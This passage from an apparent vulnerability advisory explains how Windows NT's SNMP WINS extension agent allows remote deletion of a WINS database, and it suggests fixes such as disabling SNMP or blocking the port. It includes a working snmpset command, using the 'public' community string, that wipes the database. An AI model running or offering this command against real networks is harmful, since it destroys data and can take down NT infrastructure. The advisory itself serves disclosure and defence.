2.The second exploit demonstrates the ability via SNMP to delete all of the records in a WINS database remotely, bypassing all NT security. If you understand large scale WINS architecture, you can understand the implications of this. Knowledge of SNMP community strings would allow an attacker to effectively shut down any large NT infrastructure with "N" commands (N=number of WINS servers). This is permitted due to the extensive "cmd" set implemented in the WINS extension agent, specifically:
2. cmdDeleteWins OBJECT-TYPE SYNTAX IpAddress ACCESS read-write STATUS mandatory DESCRIPTION "This variable when set will cause all information pertaining to a WINS (data records, context information to be deleted from the local WINS. Use this only when owneraddress mapping tables getting to near capacity. NOTE: deletion of all information pertaining to the managed WINS is not permitted" ::= { cmd 3 } Since the SNMP toolset implemented under NT will not do snmp-set-requests, my sample exploit was done using the CMU SNMP development kit under Unix. The command "rnjdev02:~/cmu$ snmpset -v 1 192.178.16.2 public .1.3.6.1.4.1.311.1.2.5.3.0 a 192.178.16.2" successfully entirely deleted my WINS database.
3. It appears that there are several other pieces of the LMMIB2 definition that allow for things such as remote session deletion or disconnect, etc, but I have not yet looked into them.
4. Stopping the Problem: The simplest fix is to disable SNMP, or to remove the extension agents through the SNMP configuration in the registry. If you MUST use SNMP, then at least block inbound access to that port. Be aware that using NT's various SNMP agents, a malicious intruder could gain knowledge about your